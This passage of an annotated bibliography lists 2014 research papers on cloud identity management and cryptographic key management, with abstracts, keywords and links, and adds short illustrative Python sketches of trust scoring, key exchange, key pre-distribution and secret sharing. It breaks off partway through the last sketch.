  • V. Neelaya Dhatchayani, V.S. Shankar Sriram, "Trust Aware Identity Management for Cloud Computing," International Journal of Information and Communication Technology, Volume 6 Issue 3/4, July 2014, Pages 369-380. doi: 10.1504/IJICT.2014.063220 Today, companies across the world are adopting cloud services for efficient and cost effective resource management. However, cloud computing is still in a developing stage, with many research problems yet to be solved. One such area is security, which addresses issues such as privacy, identity management, and trust management, among other things. As of now, there exists no standard identity management system for a cloud environment. The aspect of trusted propagation still needs to be tackled. This research work proposes a trusted security architecture for cloud identity management that can dynamically federate user identities. The proposed trust architecture uses Bayesian inference and a roulette wheel selection technique to evaluate trust scores. Using the proposed trust model, dynamic trust relationships are formed across multiple cloud service providers and identity providers, thereby eliminating fragmentation of user identities. The trust model was implemented and tested in Google App Engine. The performance of the trust measures was analysed.
    Keywords: (not provided) (ID#:14-2148)
    URL: http://dx.doi.org/10.1504/IJICT.2014.063220 or http://dl.acm.org/citation.cfm?id=2648896.2648906&coll=DL&dl=GUIDE&CFID=397708923&CFTOKEN=12634367
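    As an illustration of the two ingredients named in the abstract, here is a Python sketch combining a Beta-reputation trust score (one common Bayesian inference choice; the paper's exact model is not reproduced) with roulette wheel selection over hypothetical identity providers:

      import random

      # (successful interactions, failed interactions) per identity provider;
      # the provider names and counts are hypothetical.
      history = {"idp_a": (40, 2), "idp_b": (10, 5), "idp_c": (3, 3)}

      def trust(successes, failures):
          # Expected value of a Beta(successes+1, failures+1) posterior.
          return (successes + 1) / (successes + failures + 2)

      def roulette_select(scores):
          """Pick a provider with probability proportional to its trust score."""
          total = sum(scores.values())
          spin, acc = random.uniform(0, total), 0.0
          for provider, score in scores.items():
              acc += score
              if spin <= acc:
                  return provider
          return provider  # guards against floating-point edge cases

      scores = {p: trust(*h) for p, h in history.items()}
      print(scores, "->", roulette_select(scores))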

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Key Management

Key Management


Successful key management is critical to the security of any cryptosystem. It is perhaps the most difficult part of cryptography, encompassing system policy, user training, organizational and departmental interactions, and coordination among all of these elements; it covers the generation, exchange, storage, use, and replacement of keys, as well as key servers, cryptographic protocols, and user procedures. For researchers, the challenge is to create larger-scale and faster key management systems that operate within the cloud and other complex environments, while ensuring validity and not adding weight to the process. The research cited here was presented or published in the first half of 2014.

  • Talawar, S.H.; Maity, S.; Hansdah, R.C., "Secure Routing with an Integrated Localized Key Management Protocol in MANETs," Advanced Information Networking and Applications (AINA), 2014 IEEE 28th International Conference on , vol., no., pp.605,612, 13-16 May 2014. doi: 10.1109/AINA.2014.74 A routing protocol in a mobile ad hoc network (MANET) should be secure against both the outside attackers which do not hold valid security credentials and the inside attackers which are the compromised nodes in the network. The outside attackers can be prevented with the help of an efficient key management protocol and cryptography. However, to prevent inside attackers, it should be accompanied with an intrusion detection system (IDS). In this paper, we propose a novel secure routing with an integrated localized key management (SR-LKM) protocol, which is aimed to prevent both inside and outside attackers. The localized key management mechanism is not dependent on any routing protocol. Thus, unlike many other existing schemes, the protocol does not suffer from the key management - secure routing interdependency problem. The key management mechanism is lightweight as it optimizes the use of public key cryptography with the help of a novel neighbor based handshaking and Least Common Multiple (LCM) based broadcast key distribution mechanism. The protocol is storage scalable and its efficiency is confirmed by the results obtained from simulation experiments.
    Keywords: cryptographic protocols; mobile ad hoc networks; public key cryptography; routing protocols; MANET; broadcast key distribution mechanism; integrated localized key management protocol; intrusion detection system; key management protocol; mobile ad hoc network; neighbor based handshaking and least common multiple; public key cryptography; routing protocol; routing security; Ad hoc networks; Authentication; Mobile computing; Public key; Routing; Routing protocols; Intrusion Detection System (IDS); Key Management; Mobile Ad hoc Network (MANET); Secure Routing (ID#:14-2149)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6838720&isnumber=6838626
  • Zhang, Ying; Pengfei, Ji, "An Efficient And Hybrid Key Management For Heterogeneous Wireless Sensor Networks," Control and Decision Conference (2014 CCDC), The 26th Chinese , vol., no., pp.1881,1885, May 31 2014-June 2 2014. doi: 10.1109/CCDC.2014.6852476 Key management is the core of ensuring the communication security of a wireless sensor network. How to establish efficient key management in wireless sensor networks (WSN) is a challenging problem given the constrained energy, memory, and computational capabilities of the sensor nodes. Previous research on sensor network security mainly considers homogeneous sensor networks with symmetric key cryptography. Recent research has shown that using asymmetric key cryptography in heterogeneous sensor networks (HSN) can improve network performance, such as connectivity and resilience. Considering the advantages and disadvantages of symmetric and asymmetric key cryptography, the paper proposes an efficient hybrid key management method for heterogeneous wireless sensor networks: cluster heads and base stations use a public key encryption method based on elliptic curve cryptography (ECC), while adjacent nodes within a cluster use symmetric encryption. The analysis and simulation results show that the proposed key management method can provide better security, perfect scalability, and connectivity while saving storage space.
    Keywords: Elliptic curve cryptography; Encryption; Energy consumption; Wireless sensor networks; Elliptic Curve Cryptography; Heterogeneous Wireless Sensor Networks; Key Management; Symmetric Encryption (ID#:14-2150)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6852476&isnumber=6852105
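    The two tiers can be sketched in Python using the pyca/cryptography package (an assumed dependency; the paper does not prescribe an implementation): ECDH between a cluster head and the base station, and a plain symmetric key inside the cluster:

      import os
      from cryptography.hazmat.primitives.asymmetric import ec
      from cryptography.hazmat.primitives import hashes
      from cryptography.hazmat.primitives.kdf.hkdf import HKDF
      from cryptography.hazmat.primitives.ciphers.aead import AESGCM

      # Asymmetric tier: cluster head <-> base station via ECDH on P-256.
      ch_priv = ec.generate_private_key(ec.SECP256R1())
      bs_priv = ec.generate_private_key(ec.SECP256R1())
      shared = ch_priv.exchange(ec.ECDH(), bs_priv.public_key())
      link_key = HKDF(algorithm=hashes.SHA256(), length=16, salt=None,
                      info=b"ch-bs link").derive(shared)

      # Symmetric tier: nodes within a cluster share a lightweight AES key,
      # avoiding public-key cost on the most constrained devices.
      cluster_key = os.urandom(16)
      nonce = os.urandom(12)
      ct = AESGCM(cluster_key).encrypt(nonce, b"sensor reading: 21.5C", None)
      assert AESGCM(cluster_key).decrypt(nonce, ct, None) == b"sensor reading: 21.5C"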
  • Nicanfar, H.; Jokar, P.; Beznosov, K.; Leung, V.C.M., "Efficient Authentication and Key Management Mechanisms for Smart Grid Communications," Systems Journal, IEEE, vol.8, no.2, pp.629, 640, June 2014. doi: 10.1109/JSYST.2013.2260942 A smart grid (SG) consists of many subsystems and networks, all working together as a system of systems, many of which are vulnerable and can be attacked remotely. Therefore, security has been identified as one of the most challenging topics in SG development, and designing a mutual authentication scheme and a key management protocol is the first important step. This paper proposes an efficient scheme that mutually authenticates a smart meter of a home area network and an authentication server in SG by utilizing an initial password, by decreasing the number of steps in the secure remote password protocol from five to three and the number of exchanged packets from four to three. Furthermore, we propose an efficient key management protocol based on our enhanced identity-based cryptography for secure SG communications using the public key infrastructure. Our proposed mechanisms are capable of preventing various attacks while reducing the management overhead. The improved efficiency for key management is realized by periodically refreshing all public/private key pairs as well as any multicast keys in all the nodes using only one newly generated function broadcasted by the key generator entity. Security and performance analyses are presented to demonstrate these desirable attributes.
    Keywords: authorization; cryptographic protocols; home networks; public key cryptography; smart power grids; authentication server; home area network; identity-based cryptography; initial password; key generator entity; key management protocol; management overhead; public key infrastructure; public-private key pairs; secure remote password protocol; smart grid communications; Enhanced identity-based cryptography (EIBC); key management; mutual authentication; secure remote password (SRP); security; smart grid (SG); smart meter (SM) (ID#:14-2151)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6553352&isnumber=6819870
  • Kodali, Ravi Kishore, "Key Management Technique for WSNs," Region 10 Symposium, 2014 IEEE , vol., no., pp.540,545, 14-16 April 2014. doi: 10.1109/TENCONSpring.2014.6863093 In wireless sensor networks (WSNs), many tiny sensor nodes communicate using wireless links and collaborate with each other. The data collected by each of the nodes is communicated towards the gateway node after aggregation of the data by different nodes. It is necessary to secure the data collected by the WSN nodes while they communicate among themselves using multi-hop wireless links. To meet this objective, energy-efficient cryptographic algorithms are required so that they can be ported to the resource-constrained nodes. Trust must initially be established among the WSN nodes before using any of the cryptographic algorithms, and a key management technique is used for this purpose. Due to the resource-constrained nature of the WSN nodes and the remote deployment of the nodes, an implementation of conventional key management techniques is infeasible. This work proposes a key management technique, with reduced resource overheads, that is highly suited for use in hierarchical WSN applications. Both identity-based key management (IBK) and probabilistic key pre-distribution schemes are used at different hierarchical levels. The proposed key management technique has been implemented using IRIS WSN nodes. A comparison of resource overheads has also been carried out.
    Keywords: IBK; Key management; WSN; security (ID#:14-2152)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6863093&isnumber=6862973
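    The probabilistic key pre-distribution layer follows the classic Eschenauer-Gligor pattern, sketched below in Python with illustrative pool and ring sizes; the identity-based (IBK) tier used at other hierarchy levels is omitted:

      import random

      POOL_SIZE, RING_SIZE, NODES = 1000, 50, 20
      random.seed(1)
      pool = {i: f"key-{i}" for i in range(POOL_SIZE)}
      # Each node is pre-loaded with a random subset ("key ring") of the pool.
      rings = {n: set(random.sample(range(POOL_SIZE), RING_SIZE))
               for n in range(NODES)}

      def shared_key(a, b):
          """Two neighbors can communicate iff their key rings intersect;
          return one shared pool key if so."""
          common = rings[a] & rings[b]
          return pool[min(common)] if common else None

      pairs = [(a, b) for a in range(NODES) for b in range(a + 1, NODES)]
      connected = sum(1 for a, b in pairs if shared_key(a, b))
      print(f"{connected}/{len(pairs)} node pairs share at least one key")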
  • Jin Li; Xiaofeng Chen; Mingqiang Li; Jingwei Li; Lee, P.P.C.; Wenjing Lou, "Secure Deduplication with Efficient and Reliable Convergent Key Management," Parallel and Distributed Systems, IEEE Transactions on, vol.25, no.6, pp.1615,1625, June 2014. doi: 10.1109/TPDS.2013.284 Data deduplication is a technique for eliminating duplicate copies of data, and has been widely used in cloud storage to reduce storage space and upload bandwidth. Promising as it is, an emerging challenge is to perform secure deduplication in cloud storage. Although convergent encryption has been extensively adopted for secure deduplication, a critical issue in making convergent encryption practical is to efficiently and reliably manage a huge number of convergent keys. This paper makes the first attempt to formally address the problem of achieving efficient and reliable key management in secure deduplication. We first introduce a baseline approach in which each user holds an independent master key for encrypting the convergent keys and outsourcing them to the cloud. However, such a baseline key management scheme generates an enormous number of keys with the increasing number of users and requires users to dedicatedly protect the master keys. To this end, we propose Dekey, a new construction in which users do not need to manage any keys on their own but instead securely distribute the convergent key shares across multiple servers. Security analysis demonstrates that Dekey is secure in terms of the definitions specified in the proposed security model. As a proof of concept, we implement Dekey using the Ramp secret sharing scheme and demonstrate that Dekey incurs limited overhead in realistic environments.
    Keywords: cloud computing; private key cryptography; public key cryptography; storage management; Dekey; Ramp secret sharing scheme; baseline key management scheme; cloud storage; convergent encryption; data deduplication; reliable convergent key management; secure deduplication; security model; storage space reduction; Bismuth; Educational institutions; Encryption; Reliability; Servers; Deduplication; convergent encryption; key management; proof of ownership (ID#:14-2153)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6658753&isnumber=6814303
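    A minimal Python sketch of convergent encryption, the building block whose keys Dekey manages (using the pyca/cryptography package as an assumed dependency; Dekey's Ramp secret sharing of the keys across servers is not shown). Because the key is derived from the content, identical plaintexts yield identical ciphertexts and can be deduplicated:

      import hashlib
      from cryptography.hazmat.primitives.ciphers.aead import AESGCM

      def convergent_encrypt(data: bytes):
          key = hashlib.sha256(data).digest()          # K = H(M): same data, same key
          nonce = hashlib.sha256(key).digest()[:12]    # deterministic nonce keeps
          ct = AESGCM(key).encrypt(nonce, data, None)  # ciphertexts dedup-friendly
          return key, ct

      k1, c1 = convergent_encrypt(b"quarterly report")
      k2, c2 = convergent_encrypt(b"quarterly report")
      assert c1 == c2   # duplicate uploads collapse to one stored ciphertext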
  • Abdallah, W.; Boudriga, N.; Daehee Kim; Sunshin An, "An Efficient And Scalable Key Management Mechanism For Wireless Sensor Networks," Advanced Communication Technology (ICACT), 2014 16th International Conference on , vol., no., pp.687,692, 16-19 Feb. 2014. doi: 10.1109/ICACT.2014.6779051 A major issue in securing wireless sensor networks is key distribution. Current key distribution schemes are not fully adapted to the tiny, low-cost, and fragile sensors with limited computation capability, reduced memory size, and battery-based power supply. This paper investigates the design of an efficient key distribution and management scheme for wireless sensor networks. The proposed scheme can ensure the generation and distribution of different encryption keys intended to secure individual and group communications. This is performed based on elliptic curve public key encryption using Diffie-Hellman like key exchange and secret sharing techniques that are applied at different levels of the network topology. This scheme is more efficient and less complex than existing approaches, due to the reduced communication and processing overheads required to accomplish key exchange. Furthermore, only a few keys with reduced sizes are managed in sensor nodes, which optimizes memory usage and enhances scalability to large networks.
    Keywords: public key cryptography; telecommunication network management; telecommunication network topology; telecommunication security; wireless sensor networks; Diffie-Hellman like key exchange; battery-based power supply; elliptic curve public key encryption; encryption keys; group communications; key distribution schemes; large size networks; limited computation capability; network topology; processing overheads; reduced memory size; scalable key management mechanism; secret sharing techniques; secure wireless sensor networks; sensor nodes; Base stations; Elliptic curves; Public key; Sensors; Wireless sensor networks; Elliptic curve cryptography; Key management; Security; Wireless sensor networks (ID#:14-2154)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6779051&isnumber=6778899
  • Vijayakumar, P.; Bose, S.; Kannan, A, "Chinese Remainder Theorem Based Centralized Group Key Management For Secure Multicast Communication," Information Security, IET , vol.8, no.3, pp.179,187, May 2014. doi: 10.1049/iet-ifs.2012.0352 Designing a centralized group key management with minimal computation complexity to support dynamic secure multicast communication is a challenging issue in secure multimedia multicast. In this study, the authors propose a Chinese remainder theorem-based group key management scheme that drastically reduces the computation complexity of the key server. The computation complexity of the key server is reduced to O(1) in this proposed algorithm. Moreover, the computation complexity of a group member is also minimized: one modulo division operation is performed when a user join or leave operation occurs in a multicast group. The proposed algorithm has been implemented and tested against a key-star-based key management scheme, and it has been observed that the proposed algorithm reduces the computation complexity significantly.
    Keywords: communication complexity; multicast communication; multimedia communication; telecommunication security; Chinese remainder theorem; centralized group key management; computation complexity; secure multimedia multicast communication (ID#:14-2155)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6786958&isnumber=6786849
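    A toy Python version of CRT-based group key distribution, assuming the common construction in this family of schemes (the authors' exact scheme may differ): each member holds a secret pairwise-coprime modulus and key, the server CRT-combines the masked group key into one broadcast value, and each member recovers it with a single modulo division plus an XOR:

      from math import prod

      # Hypothetical members: each holds (secret prime modulus m_i, secret key k_i).
      members = {
          "u1": (1_000_003, 0x1234),
          "u2": (1_000_033, 0x5678),
          "u3": (1_000_037, 0x9abc),
      }

      def crt(residues, moduli):
          """Solve x = r_i (mod m_i) for pairwise-coprime moduli."""
          M = prod(moduli)
          x = 0
          for r, m in zip(residues, moduli):
              Mi = M // m
              x += r * Mi * pow(Mi, -1, m)   # pow(..., -1, m): modular inverse
          return x % M

      GK = 0xCAFE  # new group key chosen by the key server
      moduli = [m for m, _ in members.values()]
      residues = [GK ^ k for _, k in members.values()]
      broadcast = crt(residues, moduli)

      # Each member recovers GK with one modulo division and one XOR.
      for name, (m, k) in members.items():
          assert (broadcast % m) ^ k == GK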
  • Buchade, AR.; Ingle, R., "Key Management for Cloud Data Storage: Methods and Comparisons," Advanced Computing & Communication Technologies (ACCT), 2014 Fourth International Conference on , vol., no., pp.263,270, 8-9 Feb. 2014. doi: 10.1109/ACCT.2014.78 The cloud computing paradigm is being used because of its low up-front cost. In recent years, even mobile phone users store their data in the cloud. Customer information stored in the cloud needs to be protected against potential intruders as well as the cloud service provider. Data in transit and data in the cloud are threatened by different possible attacks. Organizations are transferring important information to the cloud, which increases concern over the security of data. Cryptography is a common approach to protect sensitive information in the cloud. Cryptography involves managing encryption and decryption keys. In this paper, we compare key management methods, apply key management methods to various cloud environments, and analyze symmetric key cryptography algorithms.
    Keywords: cloud computing; cryptography; storage management; cloud computing paradigm; cloud data storage; cloud service provider; data security; decryption key management; encryption key management; potential intruders; sensitive information protection; symmetric key cryptography algorithms; Cloud computing; Communities; Memory; Organizations; Public key; Servers; Key management; applications; cloud scenarios; onsite cloud; outsourced cloud; public cloud; symmetric key (ID#:14-2156)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6783462&isnumber=6783406
  • Lalitha, T.; Devi, AJ., "Security in Wireless Sensor Networks: Key Management Module in EECBKM," Computing and Communication Technologies (WCCCT), 2014 World Congress on, vol., no., pp.306,308, Feb. 27 2014-March 1 2014. doi: 10.1109/WCCCT.2014.12 Wireless Sensor Networks (WSN) are vulnerable to node capture attacks, in which an attacker captures one or more sensor nodes and reveals all stored security information, enabling him to compromise a part of the WSN communications. Due to the large number of sensor nodes and the lack of information about the deployment and hardware capabilities of sensor nodes, key management in wireless sensor networks has become a complex task. Limited memory resources and energy constraints are further key management issues in WSN. Hence an efficient key management scheme is necessary, one that reduces the impact of node capture attacks and consumes less energy. Through simulation results, we show that our proposed technique efficiently increases the packet delivery ratio with reduced energy consumption.
    Keywords: telecommunication network management; telecommunication security; wireless sensor networks; EECBKM; WSN communication; energy constraint; energy consumption; key management module; limited memory resource; node capture attack; packet delivery ratio; security information; wireless sensor network; Authentication; Cryptography; Nickel; Routing; Routing protocols; Wireless sensor networks; Authentication; Key Management; Security (ID#:14-2157)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6755165&isnumber=6755083
  • Gandino, F.; Montrucchio, B.; Rebaudengo, M., "Key Management for Static Wireless Sensor Networks With Node Adding," Industrial Informatics, IEEE Transactions on, vol.10, no.2, pp.1133,1143, May 2014. doi: 10.1109/TII.2013.2288063 Wireless sensor networks offer benefits in several applications but are vulnerable to various security threats, such as eavesdropping and hardware tampering. In order to reach secure communications among nodes, many approaches employ symmetric encryption. Several key management schemes have been proposed in order to establish symmetric keys. The paper presents an innovative key management scheme called random seed distribution with transitory master key, which adopts the random distribution of secret material and a transitory master key used to generate pairwise keys. The proposed approach addresses the main drawbacks of previous approaches based on these techniques. Moreover, it outperforms the state-of-the-art protocols by always providing a high security level.
    Keywords: cryptographic protocols; random processes; telecommunication network management; telecommunication security; wireless sensor networks; eavesdropping; hardware tampering; protocol; random seed distribution; secure communication; security threat; static wireless sensor network; symmetric encryption; symmetric key management scheme; transitory master key; Cryptography; Informatics; Knowledge engineering; Materials; Protocols; Wireless sensor networks; Key management; random key distribution; transitory master key; wireless sensor networks (WSNs) (ID#:14-2158)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6651779&isnumber=6809862
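    The transitory-master-key technique that the scheme builds on can be illustrated in a few lines: every node ships with the same short-lived master key, derives pairwise keys with its neighbors during the deployment window, and then erases the master key so that a later node capture exposes only that node's pairwise keys. A generic sketch of the idea, not Gandino et al.'s exact protocol; the derivation layout is an assumption.

        import hashlib
        import hmac

        def pairwise_key(master: bytes, id_a: bytes, id_b: bytes) -> bytes:
            # Sorting the identifiers makes the key direction-independent.
            lo, hi = sorted((id_a, id_b))
            return hmac.new(master, lo + b"|" + hi, hashlib.sha256).digest()

        master = b"network-wide transitory master key"  # pre-loaded before deployment
        k_ab = pairwise_key(master, b"node-A", b"node-B")
        k_ba = pairwise_key(master, b"node-B", b"node-A")
        assert k_ab == k_ba

        # After the initialization window, every node erases the master key;
        # a captured node then reveals only its own pairwise keys.
        master = None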
  • Young Sil Lee; Alasaarela, E.; HoonJae Lee, "Secure Key Management Scheme Based On ECC Algorithm For Patient's Medical Information In Healthcare System," Information Networking (ICOIN), 2014 International Conference on, vol., no., pp.453,457, 10-12 Feb. 2014. doi: 10.1109/ICOIN.2014.6799723 Recent advances in Wireless Sensor Networks have given rise to many application areas in healthcare, such as the new field of Wireless Body Area Networks (WBANs). The health status of humans can be tracked and monitored using wearable and non-wearable sensor devices. Security in WBAN is very important to guarantee and protect the patient's personal sensitive data, and establishing secure communications between BAN sensors and external users is key to addressing prevalent security and privacy concerns. In this paper, we propose a secure and efficient key management scheme based on the ECC algorithm to protect a patient's medical information in a healthcare system. Our scheme is divided into three phases: setup, registration, and verification with key exchange. We use an identification code (the SIM card number on the patient's smart phone) together with a private key generated by the legitimate user rather than by a third party. Also, to resist replay attacks, we include a counter value in every authenticated message exchange.
    Keywords: body area networks; health care; medical information systems; message authentication; public key cryptography; ECC algorithm; WBAN; authenticated message exchange; healthcare system; patient medical information protection; secure key management scheme; wireless body area networks; wireless sensor networks; Elliptic curve cryptography; Elliptic curves; Medical services; Sensors; Wireless sensor networks; Elliptic curve cryptography; body area sensor network security; healthcare security; key management; secure communication (ID#:14-2159)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6799723&isnumber=6799467
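    The counter-based replay protection mentioned in the abstract above reduces to a simple rule: every authenticated message carries a monotonically increasing counter under the MAC, and the receiver rejects any counter it has already seen. A minimal sketch, assuming a previously established shared session key (the message layout is illustrative):

        import hashlib
        import hmac

        def send(key: bytes, counter: int, payload: bytes) -> bytes:
            msg = counter.to_bytes(8, "big") + payload
            return msg + hmac.new(key, msg, hashlib.sha256).digest()

        def receive(key: bytes, packet: bytes, last_counter: int):
            msg, tag = packet[:-32], packet[-32:]
            if not hmac.compare_digest(tag, hmac.new(key, msg, hashlib.sha256).digest()):
                raise ValueError("bad MAC")
            counter = int.from_bytes(msg[:8], "big")
            if counter <= last_counter:
                raise ValueError("replayed message")  # stale counter => replay
            return msg[8:], counter

        key = b"\x01" * 32
        pkt = send(key, 7, b"blood pressure: 118/76")
        payload, last = receive(key, pkt, last_counter=6)
        assert payload == b"blood pressure: 118/76" and last == 7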
  • Pura, Mihai Lica; Buchs, Didier, "A Self-Organized Key Management Scheme For Ad Hoc Networks Based On Identity-Based Cryptography," Communications (COMM), 2014 10th International Conference on, vol., no., pp.1,4, 29-31 May 2014. doi: 10.1109/ICComm.2014.6866683 Ad hoc networks represent a very modern technology for providing communication between devices without the need for any prior infrastructure setup, and thus in an "on the spot" manner. But there is a catch: so far there is no security scheme that suits the ad hoc properties of this type of network while also accomplishing the needed security objectives. The most promising proposals are the self-organized schemes. This paper presents work in progress aiming at developing a new self-organized key management scheme that uses identity-based cryptography to render impossible some of the attacks that can be performed against the schemes proposed so far, while preserving their advantages. The paper starts with a survey of the most important self-organized key management schemes and a short analysis of their advantages and disadvantages. Then it presents our new scheme and, using informal analysis, the advantages it has over the other proposals.
    Keywords: ad hoc networks; identity based cryptography; key management; security; self-organization (ID#:14-2160)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6866683&isnumber=6866648
  • Tang, S.; Xu, L.; Liu, N.; Huang, X.; Ding, J.; Yang, Z., "Provably Secure Group Key Management Approach Based upon Hyper-Sphere," Parallel and Distributed Systems, IEEE Transactions on, vol. PP, no.99, pp.1,1, January 2014. doi: 10.1109/TPDS.2013.2297917 This supplementary file consists of three sections. In Section I, a theorem is presented to prove that the number of points on a hyper-sphere over the finite field GF(p) is at least p^(N-1) for a given hyper-sphere determined by C = (c_0, c_1, ..., c_N) ∈ GF(p)^(N+1) and R ∈ GF(p), where p is a prime. In Section II, a concrete algorithm to find a point on a hyper-sphere is constructed. In Section III, two lemmas and a theorem are proposed and proven; then the security of the proposed group key management scheme is proven formally.
    Keywords: Algorithm design and analysis; Concrete; Educational institutions; Galois fields; Protocols; Security; Vectors (ID#:14-2161)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6714432&isnumber=4359390
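    The Section II step, finding a point on a hyper-sphere over GF(p), can be sketched directly: fix all coordinates but one at random and solve the remaining quadratic with a modular square root. The sketch below assumes p ≡ 3 (mod 4) so the square root is a single exponentiation; the paper's concrete algorithm may differ.

        import secrets

        def sphere_point(c, R, p):
            # Return x in GF(p)^(N+1) with sum((x_i - c_i)^2) = R^2 (mod p).
            # Requires p % 4 == 3 so square roots are a single exponentiation.
            while True:
                xs = [secrets.randbelow(p) for _ in c[:-1]]
                t = (R * R - sum((x - ci) ** 2 for x, ci in zip(xs, c))) % p
                if t == 0:
                    return xs + [c[-1]]
                if pow(t, (p - 1) // 2, p) == 1:      # t is a quadratic residue
                    root = pow(t, (p + 1) // 4, p)    # valid because p = 3 (mod 4)
                    return xs + [(c[-1] + root) % p]
                # otherwise re-randomize and try again

        p = 2**127 - 1                 # a prime with p % 4 == 3
        c = [3, 1, 4, 1, 5]            # centre of a hyper-sphere in GF(p)^5
        R = 42
        x = sphere_point(c, R, p)
        assert sum((xi - ci) ** 2 for xi, ci in zip(x, c)) % p == (R * R) % p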
  • Jian Zhou, Liyan Sun, Xianwei Zhou, Junde Song, "High Performance Group Merging/Splitting Scheme for Group Key Management," Wireless Personal Communications: An International Journal, Volume 75, Issue 2, March 2014, Pages 1529-1545. doi: 10.1007/s11277-013-1436-x The group merging/splitting event differs from the joining/leaving events, in which only a single member joins or leaves the group: in a merging/splitting event, two small groups merge into one group, or one group is divided into two independent parts. Rekeying is an important issue for key management, whose target is to guarantee forward security and backward security in case of membership changes; however, rekeying efficiency is tied to group scale in most existing group key management schemes, so those schemes are not suitable for applications whose rekeying time delay is strictly limited. In particular, multiple members are involved in a group merging/splitting event, so rekeying performance becomes a serious concern. In this paper, a high performance group merging/splitting key management scheme is proposed based on a one-encryption-key multi-decryption-key protocol: each member holds a unique decryption key corresponding to a common encryption key, so only the common encryption key is updated when a group merging/splitting event happens, while each secret decryption key remains unchanged. Regarding efficiency, no more than one message is sent per merging/splitting event, and the network load is reduced because a single group member's key material is enough for the other group members to agree on a fresh common encryption key. Regarding security, the proposed scheme achieves the key management security requirements, including passive security, forward security, backward security, and key independence. The proposed scheme is therefore suitable for dynamic networks whose rekeying time delay is strictly limited, such as delay-tolerant networks.
    Keywords: Group key management, Group merging/splitting operation, One-encryption-key multi-decryption-key key protocol, Rekeying, Time delay (ID#:14-2162)
    URL: http://dl.acm.org/citation.cfm?id=2583852.2583893&coll=DL&dl=GUIDE or http://dx.doi.org/10.1007/s11277-013-1436-x
  • Vanga Odelu, Ashok Kumar Das, Adrijit Goswami, "A Secure Effective Key Management Scheme For Dynamic Access Control In A Large Leaf Class Hierarchy," Information Sciences: an International Journal, Volume 269, June 2014, Pages 270-285. doi: 10.1016/j.ins.2013.10.022 Lo et al. (2011) proposed an efficient key assignment scheme for access control in a large leaf class hierarchy, where alterations in leaf classes are more frequent than in non-leaf classes. Their scheme is based on a public-key cryptosystem and a hash function, where operations like modular exponentiations are very costly compared to symmetric-key encryptions and decryptions and hash computations. Their scheme performs better than previously proposed schemes. However, in this paper we show that Lo et al.'s scheme fails to preserve the forward security property: a security class C_x can still derive the secret keys of its successor classes C_j even after C_x has been deleted from the hierarchy. We propose a new key management scheme for dynamic access control in a large leaf class hierarchy which makes use of a symmetric-key cryptosystem and a one-way hash function. We show that our scheme requires significantly less storage and computational overhead compared to Lo et al.'s scheme and other related schemes. Through informal and formal security analysis, we further show that our scheme is secure against all possible attacks, including attacks on forward security. In addition, our scheme efficiently supports dynamic access control compared to Lo et al.'s scheme and other related schemes. Higher security along with low storage and computational costs thus make our scheme more suitable for practical applications than other schemes.
    Keywords: Access control, Hash function, Hierarchy, Key management, Security, Symmetric-key cryptosystem (ID#:14-2163)
    URL: http://dl.acm.org/citation.cfm?id=2598931.2599025&coll=DL&dl=GUIDE or http://dx.doi.org/10.1016/j.ins.2013.10.022
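    The symmetric-key/one-way-hash approach the paper builds on can be illustrated compactly: each class key is derived from its parent's key through a one-way hash, so any ancestor can re-derive every descendant key while the one-wayness blocks derivation in the opposite direction. A generic sketch of the technique, not Odelu et al.'s exact construction:

        import hashlib

        def child_key(parent_key: bytes, child_id: str) -> bytes:
            # One-way derivation: easy parent -> child, infeasible child -> parent.
            return hashlib.sha256(parent_key + child_id.encode()).digest()

        root = hashlib.sha256(b"central-authority-secret").digest()
        k_staff = child_key(root, "staff")
        k_nurse = child_key(k_staff, "nurse")   # a leaf class key

        # The authority (or any ancestor of "staff") re-derives k_nurse on demand,
        # so adding or deleting a leaf class only re-keys the affected subtree.
        assert child_key(child_key(root, "staff"), "nurse") == k_nurse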
  • Alireza T. Boloorchi, M. H. Samadzadeh, T. Chen, "Symmetric Threshold Multipath (STM): An Online Symmetric Key Management Scheme," Information Sciences: an International Journal, Volume 268, June 2014, Pages 489-504. doi: 10.1016/j.ins.2013.12.017 The threshold secret sharing technique has been used extensively in cryptography. It splits secrets into shares and distributes the shares across a network to provide protection against attacks and to reduce the possibility of information loss. In this paper, a new approach is introduced to enhance communication security among the nodes of a network, based on the threshold secret sharing technique and traditional symmetric key management. The proposed scheme aims to enhance the security of symmetric key distribution in a network. In the proposed scheme, key distribution is online, meaning that key management is conducted whenever a message needs to be communicated. The basic idea is to encrypt a message with a key (the secret) at the sender, then split the key into shares and send the shares along different paths to the destination. Furthermore, a Pre-Distributed Shared Key scheme is utilized for more secure transmission of the secret's shares. The proposed scheme, with the exception of some offline management by the network controller, is distributed: the symmetric key setups and the determination of the communication paths are performed in the nodes. This approach enhances communication security among the nodes of a network operating in hostile environments. Cost and security analyses of the proposed scheme are provided.
    Keywords: Multipath communication, Online key distribution, Symmetric key management, Threshold secret sharing (ID#:14-2164)
    URL: http://dl.acm.org/citation.cfm?id=2598944.2599220&coll=DL&dl=GUIDE or http://dx.doi.org/10.1016/j.ins.2013.12.017
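    The splitting step at the heart of STM is classic Shamir threshold secret sharing over a prime field: the key is the constant term of a random polynomial, each share travels along a different path, and any k shares reconstruct the key by Lagrange interpolation. A minimal sketch (field modulus and parameters are illustrative; the STM scheme layers online path selection and pre-distributed shared keys on top):

        import secrets

        P = 2**127 - 1   # prime field modulus; the key must be smaller than it

        def split(secret: int, n: int, k: int):
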